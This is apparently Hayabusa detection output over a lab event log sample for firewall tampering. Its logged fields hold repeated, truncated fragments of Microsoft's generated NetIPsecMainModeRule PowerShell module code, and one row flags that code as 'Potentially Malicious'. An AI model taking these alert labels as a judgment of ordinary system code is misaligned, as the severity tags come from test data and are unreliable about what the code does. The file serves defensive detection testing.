$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 